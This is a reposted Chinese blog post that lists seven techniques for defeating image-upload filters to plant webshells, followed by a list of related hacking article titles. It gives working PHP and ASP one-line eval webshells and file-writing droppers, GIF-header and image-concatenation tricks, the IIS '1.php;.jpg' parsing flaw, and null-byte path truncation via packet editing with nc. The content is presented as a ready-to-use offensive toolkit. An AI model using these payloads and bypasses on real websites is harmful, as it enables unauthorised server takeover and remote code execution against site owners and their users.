分享上传图片shell的绕过过滤的几种方法
来源:互联网 发布:罗比威廉姆斯 知乎 编辑:程序博客网 时间:2024/06/02 04:31
一般网站图片上传功能都对文件进行过滤,防止webshell写入。但不同的程序对过滤也不一样,如何突破过滤继续上传?
本文总结了七种方法,可以突破!
1、文件头+GIF89a法。(php)//这个很好理解,直接在php马最前面写入gif89a,然后上传dama.php
2、使用edjpgcom工具向图片注入代码。(php)//edjpgcom修改,加入php一句话保存为dama.php
3、cmd命令下copy 图片.GIF+shell.php webshell.php (php) //估计和1是同样的原理,欺骗上传webshell.php
4、C32asm打开图片在文件末尾空一格加入代码<?php eval($_POST[cmd])?> 。(php)//填充php一句话然后上传。
5、在4基础上改进代码<?php fputs(fopen("error.php"."w")."<?eval(\$_POST[cmd]);?>")?> 。(php)//同
目录下生成error.php,提问:asp的怎么改写?
回答:asp测试的结果是:没有权限…
<%
Set MyFileObject=Server.CreateObject("Scripting.FileSystemObject")
Set MyTextFile=MyFileObject.CreateTextFile("kafei.asp")
MyTextFile.WriteLine("\<\%eval request(chr(35))\%\>")
MyTextFile.Close
%>
6、IIS解析目录名漏洞1.php;.jpg (jpg) //这是文件名变量没有过滤。
7、nc抓包改数据 //路径名和文件名没有过滤。
//通过抓包修改上传路径通过/upload/1.asp+空格,使用软件把空格填充为00。然后nc提交获取webshell。
- 分享上传图片shell的绕过过滤的几种方法
- 分享几种绕过防注入的方法
- 绕过防注入的几种方法
- xss绕过过滤方法分享 及有关web攻击的方法
- xss绕过过滤方法分享 及有关web攻击的方法
- mysql注入绕过空格过滤的方法
- XSS下的绕过过滤方法
- 文件上传的一些绕过方法
- 文件上传漏洞的相关绕过方法
- 几种在shell命令行中过滤adb logcat输出的方法
- 几种在shell命令行中过滤adb logcat输出的方法
- 几种在shell命令行中过滤adb logcat输出的方法-[转]
- 几种在shell命令行中过滤adb logcat输出的方法
- Android shell命令行中过滤adb logcat输出的几种方法
- Gson 过滤字段的几种方法
- Gson 过滤字段的几种方法
- Gson 过滤字段的几种方法
- 简易的图片上传,分享.
- 5、CAS单点登录源码解析之【集成新浪腾讯微博】
- 突破变态限制快捷方式提权法
- 2003搭建VPN
- 安装Kali Linux 后需要做的 20 件事 - 51CTO.COM
- 中间人攻击-ARP毒化
- 分享上传图片shell的绕过过滤的几种方法
- WiFi安全测试工具WiFiPhisher
- 分享几种绕过防注入的方法
- 记录利用ettercap进行简单的arp欺骗和mitm攻击过程
- Ettercap结合sslstrip对ssl/https进行攻击
- Debian/Kali 安装原生Firefox
- Wifi密码破解
- 使用websploit在局域网全自动渗透
- 轻松bypass360网站卫士WAFSQL注入防护